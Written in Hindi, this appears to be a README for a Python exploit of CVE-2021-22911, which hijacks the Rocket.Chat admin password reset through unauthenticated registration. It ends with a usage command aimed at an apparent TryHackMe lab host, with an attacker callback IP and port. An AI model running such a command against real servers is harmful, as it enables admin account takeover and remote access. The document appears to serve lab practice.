
CVE-2021-22911 के लिए Python एक्सप्लॉइट स्क्रिप्ट जो अप्रमाणित उपयोगकर्ता पंजीकरण के माध्यम से Rocket.Chat एडमिन पासवर्ड रीसेट को लक्षित करती है। कॉन्फ़िगर करने योग्य लक्ष्य, एडमिन उपयोगकर्ता नाम और कॉलबैक IP के साथ शोषण को स्वचालित करता है।
यदि आप पहले से ही एक उपयोगकर्ता पंजीकृत कर चुके हैं, तो यह केवल व्यवस्थापक पासवर्ड रीसेट करेगा, दोनों को नहीं। जिससे एक्सप्लॉइट बहुत तेज़ी से चलेगा।
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80